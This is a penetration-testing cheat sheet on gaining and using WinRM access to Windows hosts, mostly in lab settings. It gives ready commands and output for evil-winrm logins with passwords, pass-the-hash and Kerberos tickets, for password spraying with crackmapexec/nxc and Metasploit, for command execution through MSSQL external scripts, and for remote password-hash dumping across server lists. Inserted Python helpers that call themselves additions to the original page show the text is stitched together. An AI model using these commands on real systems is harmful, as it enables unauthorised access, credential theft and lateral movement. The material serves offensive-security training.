WinRM (5985, 5986)
Nmap
nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n
Evil-WinRM
evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"
evil-winrm cannot take an IPv6 address directly: add an entry to /etc/hosts that maps a name to the IPv6 address and connect to that name instead, as in the following session.
SQL (hacker dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::1001
IPv6 Address. . . . . . . . . . . : dead:beef::7912:217c:56e7:f15b
Link-local IPv6 Address . . . . . : fe80::d379:8c3e:971a:5199%8
IPv4 Address. . . . . . . . . . . : 10.13.38.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:fe94:1921%8
10.13.38.2
Ethernet adapter Ethernet1 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.20.128.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Express Edition will continue to be enforced.
SQL (hacker dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
COMPATIBILITY
Express Edition will continue to be enforced.
# cat /etc/hosts | grep comp
dead:beef::1001 compatibility
# evil-winrm -u 'administrator' -p 'SecretPassword' -i compatibility
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
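The session above reads the target's IPv6 address off ipconfig output by hand. As an added example (not part of the original page), the following Python parses that dotted ipconfig format into per-adapter fields and turns every routable IPv6 address into an /etc/hosts line, skipping link-local (fe80::/10, %zone) addresses and gateway entries; the sample text is constructed and the hostname is an assumption.

```python
import ipaddress
import re

# Constructed sample modelled on the ipconfig output returned through
# sp_execute_external_script above; it is not the page's own capture.
SAMPLE_IPCONFIG = """\
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix . :
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::7912:217c:56e7:f15b
   Link-local IPv6 Address . . . . . : fe80::d379:8c3e:971a:5199%8
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Default Gateway . . . . . . . . . : dead:beef::1
Ethernet adapter Ethernet1 2:
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
"""

ADAPTER_RE = re.compile(r"^\S.*adapter (?P<name>.+):\s*$")
# indented label, dot/space padding, ':' and a non-empty value
FIELD_RE = re.compile(r"^\s+(?P<label>[^.:]+?)[ .]*:\s*(?P<value>\S+)\s*$")


def parse_ipconfig(text: str) -> dict:
    """Return {adapter name: [(label, value), ...]} in output order."""
    adapters: dict = {}
    current = None
    for line in text.splitlines():
        m = ADAPTER_RE.match(line)
        if m:
            current = m.group("name")
            adapters[current] = []
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            adapters[current].append((m.group("label"), m.group("value")))
    return adapters


def hosts_entries(text: str, hostname: str) -> list:
    """/etc/hosts lines for every routable IPv6 address the host reported."""
    entries: list = []
    for fields in parse_ipconfig(text).values():
        for label, value in fields:
            # "Link-local IPv6 Address" (fe80::/10, %zone suffix) is only
            # reachable on the local segment; "Default Gateway" is another box.
            if label != "IPv6 Address":
                continue
            addr = ipaddress.ip_address(value.split("%", 1)[0])
            if addr.version == 6 and not addr.is_link_local:
                entries.append(f"{addr} {hostname}")
    return entries
```

Append the returned lines to /etc/hosts and point evil-winrm at the name, exactly as the session above does.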
With Kerberos
$ cat /etc/krb5.conf
[libdefaults]
default_realm = DOMAIN.HTB
[realms]
DOMAIN.HTB = {
kdc = dc01.domain.htb
}
[domain_realm]
.domain.htb = DOMAIN.HTB
domain.htb = DOMAIN.HTB
$ impacket-getTGT 'domain.htb/username:password' -dc-ip 10.10.11.31
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in m.harris.ccache
$ KRB5CCNAME=username.ccache evil-winrm -u username -i dc01.domain.htb -r domain.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\username\Documents>
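Kerberos auth through evil-winrm only works when the host given to -i resolves, through the [domain_realm] rules of krb5.conf, to the realm given to -r, and that realm has a kdc. As an added example (not from the page or from evil-winrm), this Python parses the krb5.conf shown above and applies the same lookup order Kerberos uses (exact hostname, then parent domains with a leading dot), so an unmapped host is caught before the ticket is rejected; the config text is constructed and the realm/KDC names are assumptions.

```python
# Constructed krb5.conf modelled on the one in the section above; assumed
# realm/KDC names, not taken from any real host.
SAMPLE_KRB5 = """\
[libdefaults]
    default_realm = DOMAIN.HTB
[realms]
    DOMAIN.HTB = {
        kdc = dc01.domain.htb
    }
[domain_realm]
    .domain.htb = DOMAIN.HTB
    domain.htb = DOMAIN.HTB
"""


def parse_krb5_conf(text: str) -> dict:
    """Minimal parser: [section] of key = value, plus one level of { } blocks."""
    conf: dict = {}
    section = block = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section, block = line[1:-1], None
            conf.setdefault(section, {})
        elif section is None:
            continue  # stray line before the first section header
        elif line == "}":
            block = None
        elif line.endswith("{"):
            block = line[:-1].strip(" =")
            conf[section][block] = {}
        else:
            key, _, value = line.partition("=")
            target = conf[section][block] if block else conf[section]
            target[key.strip()] = value.strip()
    return conf


def resolve(conf: dict, host: str):
    """Apply [domain_realm] (exact host, then parent domains with a leading dot)
    and return (realm, kdc); (None, None) means Kerberos has no mapping for host."""
    mapping = conf.get("domain_realm", {})
    host = host.lower()
    labels = host.split(".")
    candidates = [host] + ["." + ".".join(labels[i:]) for i in range(1, len(labels))]
    realm = next((mapping[c] for c in candidates if c in mapping), None)
    kdc = conf.get("realms", {}).get(realm, {}).get("kdc") if realm else None
    return realm, kdc
```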
With docker
docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password'
Upload
*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop
Download
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip
Metasploit
msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17
rhosts => 192.168.210.17
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator
USERNAME => Administrator
msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local
DOMAIN => internal.zsm.local
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
msf6 auxiliary(scanner/winrm/winrm_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 192.168.210.17:5985 - Login Successful:
NetExec - CME
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Command execution
[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB 10.129.202.136 445 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.202.136 5985 WINSRV [+] WINSRV\john:november (admin)
WINRM 10.129.202.136 5985 WINSRV [+] Executed command (shell type: powershell)
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Directory: C:\
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Mode LastWriteTime Length Name
WINRM 10.129.202.136 5985 WINSRV ---- ------------- ------ ----
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM PerfLogs
WINRM 10.129.202.136 5985 WINSRV d-r--- 12/14/2020 6:38 PM Program Files
WINRM 10.129.202.136 5985 WINSRV d----- 2/11/2022 6:10 AM Program Files (x86)
WINRM 10.129.202.136 5985 WINSRV d-r--- 1/6/2022 6:49 AM Users
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM Windows
WINRM 10.129.202.136 5985 WINSRV
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #
PSSession
Enabled by default on Server 2012 onwards with firewall exception
PSRemoting uses WinRM
On desktop editions, remoting may need to be enabled first (admin privileges required): Enable-PSRemoting
Create a session on a remote computer
$Server01 = New-PSSession -ComputerName Server01
List PSSession
Get-PSSession
Enter-PSSession
To use the PSSession to interact directly with a remote computer, use the Enter-PSSession cmdlet
PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT
[SEC504STUDENT]: PS C:\Users\Sec504\Documents>
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Get-Service | Where-Object -Property Status -EQ Running
Status Name DisplayName
------ ---- -----------
Running AarSvc_75beb Agent Activation Runtime_75beb
Running Appinfo Application Information
Running AppXSvc AppX Deployment Service (AppXSVC)
Running AudioEndpointBu... Windows Audio Endpoint Builder
Running Audiosrv Windows Audio
Running BFE Base Filtering Engine
...
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>
Pass Username / password
New-PSSession -Session $s -Credential Domain01\User01
With a variable
PS C:\WINDOWS\system32> $cred = Get-Credential
cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
PS C:\WINDOWS\system32> $cred
UserName Password
-------- --------
sec504 System.Security.SecureString
Or
$Username = "USERNAME"
$SecurePassword = "PLAINPASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$PScred = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName,$SecurePassword
$cred = New-Object Management.Automation.PSCredential ("Administrator", (ConvertTo-SecureString "Sup3Rp@ssw0rd" -AsPlainText -Force))
PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT -Credential $cred
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> $env:USERNAME
Sec504
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>
Interact with an existing session
Enter-PSSession -Id 19
Enter-PSSession -Name Session1
Enter-PSSession -Session $session1
Execute commands or script blocks
Invoke-Command -ScriptBlock{hostname;whoami} -Session $session1
Invoke-Command -ScriptBlock{C:\Users\Public\hostname.ps1} -Session $session1
Invoke-Command -ScriptBlock{Get-Process} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -FilePath C:\scripts\script.ps1 -ComputerName (Get-Content <list_of_servers>)
Execute a locally loaded function on the remote machines
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList
Stateful commands
$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
Winrs
winrs -remote:server1 -u:server1\administrator -p:passw0rd hostname
WSMan-WinRM
Resources